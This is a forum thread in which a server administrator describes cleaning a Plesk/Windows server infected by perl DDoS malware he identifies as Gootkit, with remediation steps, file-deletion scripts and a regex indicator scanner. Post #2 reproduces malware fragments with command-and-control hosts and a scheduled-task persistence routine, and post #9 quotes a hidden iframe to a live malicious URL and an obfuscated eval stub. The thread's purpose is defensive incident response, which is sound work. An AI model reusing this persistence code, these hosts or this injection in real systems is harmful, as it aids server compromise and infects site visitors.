DNS Flooding attack SERVER 2008 r2 high outgoing bandwidth usage
  • DNS Flooding attack SERVER 2008 r2 high outgoing bandwidth usage

    Hi guys,
    we have been the victim of a flooding attack in the last weeks and all techs are working on the issue in order to solve it.
    We checked the whole system with KAS, Microsoft Essential, Malwarebytes and now with Sophos, and as a last one we will also check with Bitdefender in order to be sure that no virus or malware has infected our server.
    However we googled and found this interesting article about this type of attack, which seems to affect several Windows servers in the last few months, Problem with DNS.exe high outgoing bandwidth usage, where there is an interesting suggestion to also check perl scripts, which could be the cause of this type of server issue.

    We're now checking perl files on the server in order to be sure that this is not the issue.

    Is anyone still annoyed by a similar issue..... has anyone found a different solution?


    Giorgio

  • #2
    Hi Guys,
    I think that I found a possible solution.
    As per the previous ticket I checked the perl scripts and in effect I found more duplicate files with the same function, where one has a really pretty good name, "demonize".
    Seems the attack was done with "Gootkit"; in my particular case it seems to depend on the fact that someone has hacked Plesk, got an FTP user and password and played with my server.
    So what we need to do in order to make order and secure the server:

    1. close the FTP port in order to prevent any upload
    2. download TextCrawler or any other text search tool which includes regex
    3. stop all services in order to prevent massive usage of bandwidth and resources on the server
    4. when the server is null-routed, scan the whole server with different antivirus; I personally suggest KAS, Sophos, Bitdefender, Malwarebytes, Microsoft Essential, in order to check for virus or malware infection
    5. check whether a Plesk patch is needed and apply it to the Plesk panel
    6. scan your hard drive, all hard drives, to find all files with extension .pl (perl) and you can use this little
    here below a little portion of the script which can help you to identify this evil:
    Code:
    #part of the Gootkit ddos system
    use Fcntl qw(:flock :DEFAULT);	
    
    use Socket;
    use IO::Socket;
    use IO::Select;
    
    use POSIX 'setsid';
    use Cwd 'abs_path';
    
    print "Content-type: text/plain\n\n";
    
    #---------------------------------------------------#
    #	CUSTOM parameters								#
    #---------------------------------------------------#
    my $number_of_bots = 5;
    my @defaults = ("callebook.com:80", "cellularebook.com:80", "whitewithstand.com:80");
    my $pingTimeout = 1200;
    my $proxyPort = 5432;
    #---------------------------------------------------#
    
    
    my $lockfilename;
    my $serverfile;
    my $idfile;
    my $uafile;
    
    my $kernel;
    my $version = "2";
    my $localip; 
    my $botid;
    my $ua;
    
    my $script_path = abs_path($0);
    
    if ($^O eq "MSWin32"){
    	my $temp = `echo %temp%`;
    	chomp $temp;
    	$lockfilename = $temp."\\~PIF3E6.tmp";
    	$serverfile = $temp."\\~PIFSRV6.tmp";
    	$idfile = $temp."\\~PIFID45.tmp";
    	$uafile = $temp."\\~PIFUA11.tmp";
    }
    else {
    	$lockfilename = "/tmp/apachectrl.lock";
    	$serverfile = "/tmp/apachectrl.log";
    	$idfile = "/tmp/id";
    	$uafile = "/tmp/ua";
    }
    or

    Code:
    #------------------------------------------------------------------#
    sub demonize {
    		
    	if ($^O eq "MSWin32")
    	{
    		my $schedDelete = "schtasks /delete /f /tn perl";
    		my $schedCreate = "schtasks /create /tr \"".$^X." ".abs_path($0)." detach\" /tn perl /sc MINUTE /mo 1";
    		print $schedDelete."\n";
    		print  $schedCreate."\n";
    		`$schedDelete`;
    		`$schedCreate`;
    		
    		
    		my $child_proc;
    		print "detach...\n";
    		require Win32::Process;
    		Win32::Process::Create($child_proc, "$^X", "perl.exe ".abs_path($0)." normal", 0, DETACHED_PROCESS, ".") || die "Could not spawn child: $!";
    		$child_pid = $child_proc->GetProcessID();		
    		print "child_pid = $child_pid, pid = $$ \n";
    			
    		sleep(1.0);
    		POSIX::waitpid(-1, POSIX::WNOHANG()); # clean up any defunct child process
    		print "exit pid=$$\n";
    		exit;
    	}
    	else {
    		$SIG{CHLD} = \&REAPER;
    		if ( fork() ) {
    			exit;
    		}		 
    		setsid();
    when you find all these files proceed to delete them. TAKE CARE: EACH FILE CHANGES ITS NAME, no one will be the same as the previous one. This search may show you some other files which are needed by the system if you enabled Perl...... take care to delete only the required files.

    7. Check all your cronjobs; it seems that the script also places a cronjob on the server (not sure again about it)
    8. Change all Plesk administrator and customer passwords; I personally suggest really strong passwords and you may also find an interesting online tool for strong password generation.
    9. Change all FTP accounts and passwords. Personal suggestion: use as username a string which reflects a password without any special character, and a strong password as mentioned above (you may use the same tools to do it).
    10. When all is done, reactivate services one by one, checking traffic with netstat or any other tool that you know in order to verify that the situation is normalized and no high bandwidth usage continues.

    Continuing to monitor your server is the most important thing in order to reduce and prevent any other attack.

    I'm not sure that all this stuff can absolutely solve all the issues but it seems to have helped us.

    I hope that you may find this info helpful


    Giorgio



    • #3
      How to delete a lot of files in a few lines of code

      If someone needs help, here is a simple version of a simple VB.NET script to delete all files in a simple manner (you may also opt for a PS script or anything you think could be more practical for you)

      This simple script assumes that you have a simple form with a button and a progress bar, nothing else

      Code:
      Public Class Form1
      
          Private Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles Button1.Click
              ' Ask for the text file that lists one full path per line
              Dim o As New OpenFileDialog
              If o.ShowDialog() <> DialogResult.OK OrElse String.IsNullOrWhiteSpace(o.FileName) Then
                  MsgBox("Choose a file listing the paths to delete")
              Else
                  DeleteFilesFromDrives(o.FileName)
              End If
          End Sub

          Private Sub DeleteFilesFromDrives(filepath As String)
              Dim Sr As New System.IO.StreamReader(filepath)
              Dim ListItems As New List(Of String)
      
              ' Peek returns -1 at end of stream, so test >= 0 (the original "> 0" could stop early)
              While Sr.Peek >= 0
                  Dim line As String = Sr.ReadLine().Trim()
                  If line.Length > 0 Then ListItems.Add(line)
              End While
              Sr.Close()
      
              With ProgressBar1
                  .Minimum = 0
                  .Maximum = ListItems.Count
                  .Value = 0
                  .Step = 1
                  .Show()
              End With
              Dim LogString As String = "[{0}]:{1} {2}"
              'Start to delete, logging the result for every path
              Dim Sb As New System.Text.StringBuilder
              For i As Integer = 0 To ListItems.Count - 1
                  Try
                      If System.IO.File.Exists(ListItems(i)) Then
                          System.IO.File.Delete(ListItems(i))
                          Sb.AppendLine(String.Format(LogString, Now.ToString, ListItems(i), "DELETED"))
                      Else
                          Sb.AppendLine(String.Format(LogString, Now.ToString, ListItems(i), "NOT FOUND"))
                      End If
                  Catch ex As Exception
                      Sb.AppendLine(String.Format(LogString, Now.ToString, ListItems(i), "FAILED: " & ex.Message))
                  End Try
                  ProgressBar1.PerformStep()
              Next
              ' Replace the placeholder with the full path of the log file to write
              Dim Sw As New System.IO.StreamWriter("YOUR PATH WHERE SAVE YOUR DATA ABOUT DELETE TASK(WITH FILE NAME AT THE END)")
              Sw.Write(Sb.ToString)
              Sw.Close()
          End Sub
      End Class
      It works great for me

      Giorgio



      • #4
        Using PS1 to remove unwanted files

        Here you may also find a simple PS1 script (PowerShell) that you can run.
        It is provided as is without any warranty; if you're not sure about what you are doing, ask someone who can help you.

        Code:
        # The CSV needs a column named FILETODELETE with one full path per row
        $FileName = "YOUR_FILEPATH_AS_CSV.csv"
        $SavePath = "YOUR_FILEPATH_WHERE_SAVE_LOG_OPERATION_AS_TXT.TXT"
        $FilesToDelete = Import-Csv $FileName
        $stream = [System.IO.StreamWriter] $SavePath

        $FilesToDelete | ForEach-Object {
            $PT = $_.FILETODELETE
            # Parenthesise the concatenation: Write-Host "Checking " + $PT prints a literal "+"
            Write-Host ("Checking " + $PT)
            $stream.WriteLine("Checking " + $PT)
            # -LiteralPath so that [ ] * ? in a path are not expanded as wildcards
            If (Test-Path -LiteralPath $PT) {
                $stream.WriteLine("File exists....deleting")
                Remove-Item -LiteralPath $PT
                $stream.WriteLine("File " + $PT + " successfully deleted")
                Write-Host ("File " + $PT + " successfully deleted")
            } else {
                $stream.WriteLine("File " + $PT + " not found.")
            }
        }
        # Close() needs the parentheses; "$stream.close" only displays the method and leaves the log unflushed
        $stream.Close()
        I hope it is helpful to you


        Giorgio



        • #5
          This post should be made sticky..! Great info Giorgio, that's a lot of useful searching..!



          • #6
            Originally posted by JamesC:
            This post should be made sticky..! Great info Giorgio, that's a lot of useful searching..!
            Sticky done!

            Great post Giorgio ! Thanks for taking the efforts with posting a useful material for our fellow forum mates.



            • #7
              How to perform a massive Plesk password reset.

              Hi guys,
              many thanks for the kind words about my effort; however I have another little update about it.
              After we deleted all the files involved in the attack the server seems to be working fine now, but in my particular case I have more than 300 FTP accounts to change and those tasks would require a lot of time.
              In order to reduce the work time I checked with Spencer of Webhosting.uk.com and we found this interesting post about using a Plesk script to perform this action as a bulk operation, Massive Plesk Password Reset, and when it has finished you will have a .csv stored wherever you want with all the details of the new account passwords.
              In this particular tool you will find a lot of options to choose how to reset your passwords.
              When you run this script it will take care to change, as per your requirements, all passwords on admin accounts, domain FTP, additional FTP, customer FTP, etc etc etc.
              Yesterday we performed it on our server and it worked very fine; however, in order to be sure that all is fine, after you have performed those tasks you must take care to check that all domains work as well and also that FTP works with the new passwords.

              I hope that it will be very helpful to all of you.

              Regards
              Giorgio



              • #8
                Hi guys,
                I forgot one important thing!!!!
                When you're the victim of this type of attack you should pay attention to the files in your domains, because you may also be the victim of script injection/code injection.
                In my case I found more files which were corrupted with code injection, typically a hidden iframe and/or hidden script injection.
                In both cases the script uses a default schema, for example

                HIDDEN IFRAME STANDARD
                Code:
                <--!--><IFRAM SRC="REDIRECTURL"/><--!-->

                HIDDEN SCRIPT STANDARD
                Code:
                <--!--><SCRIPT TYPE="JAVASCRIPT">JAVASCRIPT CODE</SCRIPT><--!-->
                In order to remove this malicious script you may:

                RE-UPLOAD YOUR CONTENT
                SEARCH WITH TEXTCRAWLER
                CREATE YOUR OWN SCRIPT WHICH REPLACES THIS PARTICULAR TEXT

                I hope that this could help you and that you find it helpful

                Giorgio



                • #9
                  Originally posted by giorgio turri:

                  HIDDEN IFRAME STANDARD
                  Code:
                  <--!--><IFRAM SRC="REDIRECTURL"/><--!-->
                  HIDDEN SCRIPT STANDARD
                  Code:
                  <--!--><SCRIPT TYPE="JAVASCRIPT">JAVASCRIPT CODE</SCRIPT><--!-->
                  I wrote the wrong tags, excuse me; here are the right ones:

                  Code:
                   <!-- . --><iframe width="1px" height="1px" src="http://papapkz.myvnc.com/openstat/appropriate/bound-side-load_odds.php" style="display: block;" ></iframe>

                  and here another one

                  Code:
                  <!-- . -->
                  Take care that this is one of the URLs that they use..... and this is the tag that you can use to search with regex in your files:
                  Code:
                  <!-- . -->
                  Google Webmaster Tools sent me an alert which says that it has recognized this malware on the site from this little string
                  Code:
                  if(!zz)eval(ss["fromCharCode"].apply(ss,a));
                  This could be a starting point to check your files as per Google's suggestion

                  Bye
                  Giorgio

                  PS my server is now clean and we're not facing any other issues .... thanks guys
                  Last edited by giorgio turri; 28-06-13, 10:43 PM.
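Added example, not from the thread or from any of the tools it names: a read-only indicator scan in Python that covers step 6 of post #2 (finding the Gootkit perl files by their fixed strings) and the injected iframe/script markers from post #9 in one pass, reporting hits without touching the files. The directory layout, sample file contents and the example.invalid URL are constructed; the indicator strings are the ones quoted in the thread.

```python
import re
import tempfile
from pathlib import Path

# Indicators quoted in the thread: Gootkit perl fragments (post #2), injected iframe/script markers (posts #8, #9).
PERL_MARKERS = [
    re.compile(r"sub\s+demonize\b"),
    re.compile(r"/tmp/apachectrl\.lock"),
    re.compile(r"schtasks\s+/create\b.*\s/tn\s+perl\b"),
]
WEB_MARKERS = [
    re.compile(r"<!--\s*\.\s*-->"),                               # comment the injector leaves as anchor
    re.compile(r'<iframe[^>]*\b(?:width|height)="1px"', re.I),    # 1x1 hidden iframe
    re.compile(r'eval\(ss\["fromCharCode"\]\.apply\(ss,a\)\)'),   # decoder stub Google flagged
]
MARKERS_BY_EXT = {".pl": PERL_MARKERS, ".html": WEB_MARKERS, ".htm": WEB_MARKERS,
                  ".php": WEB_MARKERS, ".js": WEB_MARKERS}

def scan_tree(root):
    """Return {relative path: [matched patterns]} for files under root that hit an indicator.
    Files are only reported here; review them before deleting or re-uploading clean copies."""
    hits = {}
    for path in Path(root).rglob("*"):
        patterns = MARKERS_BY_EXT.get(path.suffix.lower())
        if not path.is_file() or not patterns:
            continue
        text = path.read_text(errors="replace")
        found = [p.pattern for p in patterns if p.search(text)]
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

# Constructed sample tree (not real server content) mirroring what the thread describes.
SAMPLES = {
    "httpdocs/index.html": '<html><body><!-- . --><iframe width="1px" height="1px" '
                           'src="http://example.invalid/x.php" style="display: block;"></iframe></body></html>',
    "httpdocs/clean.html": "<html><body><p>Hello</p></body></html>",
    "httpdocs/app.js": 'if(!zz)eval(ss["fromCharCode"].apply(ss,a));',
    "cgi-bin/stats.pl": 'sub demonize {\n    $lockfilename = "/tmp/apachectrl.lock";\n}\n',
    "cgi-bin/report.pl": 'use strict;\nprint "ok\\n";\n',
}

def demo():
    """Write the samples to a temporary directory, scan it and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLES.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_tree(tmp)
```

Point scan_tree at the document root and cgi-bin directories of each Plesk domain; the returned paths can be written to the CSV or text list that the delete scripts in posts #3 and #4 consume, after a manual review.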
